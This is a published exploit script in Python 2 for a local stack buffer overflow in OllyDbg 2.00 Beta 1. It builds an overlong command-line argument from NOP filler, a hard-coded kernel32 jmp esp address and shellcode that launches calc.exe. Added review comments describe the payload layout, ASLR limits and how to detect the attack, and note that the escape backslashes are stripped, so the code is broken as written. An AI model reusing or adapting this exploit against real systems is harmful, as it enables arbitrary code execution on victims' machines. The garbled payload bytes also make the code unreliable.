
# Title : Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit
# Published : 2010-02-15
# Author : _SuBz3r0_


# Exploit Title: [Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit]
# Date: [2010-02-15]
# Author: [_SuBz3r0_]
# Software Link: [http://www.ollydbg.de/version2.html]
# Version: [2.00 Beta 1]
# Tested on: [XP SP3]
# CVE : [if exists]
# Code :
#Ollydbg2 v2.00 beta1 Exploit in Python
#
# Published proof-of-concept (2010) for a local stack-based overflow in
# OllyDbg 2.00 Beta 1: the debugger is started with a single, very long
# command-line argument. Python 2 syntax throughout (print statements).
# Retained as reference for detection and mitigation review; the banner
# below is the author's description of the payload layout.
print ""
print "##############################################"
print "# _SuBz3r0_ #"
print "##############################################"
print ""
print "Ollydbg v2.00 beta 1 local overflow Exploit"
print "Just For Fun"
print "exploit = [NOP] + [jmp ESP] + [SH3LLC0DE]"
print "Shellcode = calc.exe"
print ""
print "Greetz:piloo le canari & MaX"
print "Tested on: French Windows Xp Sp3 fully Patched"
print ""

import os
import sys

#path to ollydbg.exe
# Hard-coded location of the target binary; in Python 2 '\o' is not a
# recognised escape, so the backslash survives in the literal.
program = 'c:\ollydbg.exe'

#exploit = [NOP] + [jmp ESP] + [SH3LLC0DE]
#overflow =786*'x90'
#eip = "x13x44x87x7c" : kernel32.dll jmp esp
#Shellcode pop up calc.exe
#
# Layout per the author's comments: 786 bytes of filler, a 4-byte return
# address described as a "jmp esp" inside kernel32.dll, then the calc.exe
# payload. Presumably this depends on a fixed, non-randomised kernel32 base
# (the author tests on XP SP3, L15/L30) -- on ASLR/DEP-enabled systems a
# hard-coded address of this kind would not land where intended.
#
# NOTE(review): in this copy the escape backslashes appear to have been
# stripped ('x90' rather than '\x90'), so as written every piece below
# evaluates to plain ASCII text, not the byte values the comments describe.
#
# Defensive observable: a debugger process launched with one ~800+ character
# argument containing non-printable/high-entropy content; command-line
# argument-length auditing or process-creation logging would surface it.
exploit =786*'x90'+'x13'+'x44'+'x87'+'x7c'+''.join([
'xb4x31xf8x2dx84xe3x04x35xb8x3cx14x46x34x48',
'x67xfcx31xc9x83xe9xe2xe8xffxffxffxffxc0x5e',
'x81x76x0ex03xf9xd8x37x83xeexfcxe2xf4xffx11',
'x9cx37x03xf9x53x72x3fx72xa4x32x7bxf8x37xbc',
'x4cxe1x53x68x23xf8x33x7ex88xcdx53x36xedxc8',
'x18xaexafx7dx18x43x04x38x12x3ax02x3bx33xc3',
'x38xadxfcx33x76x1cx53x68x27xf8x33x51x88xf5',
'x93xbcx5cxe5xd9xdcx88xe5x53x36xe8x70x84x13',
'x07x3ax87x06xf5x99x8ex53x88xbfxe8xbcx43xf5',
'x53x47x1fx54x53x5fx0bx70x20xb4xc3x93x88x5f',
'xf3x73xdcx68x6bx61x26xbdx0dxaex27xd0x60x98',
'xb4x54x03xf9xd8x37'])

print ""
# os.execl replaces the current Python process with the target; argv becomes
# [program, program, exploit] -- the path is passed twice (argv[0] and
# argv[1]) and the payload string is argv[2]. Nothing after this line runs,
# and no error handling exists if the path does not exist (OSError propagates).
os.execl(program,program,program,exploit)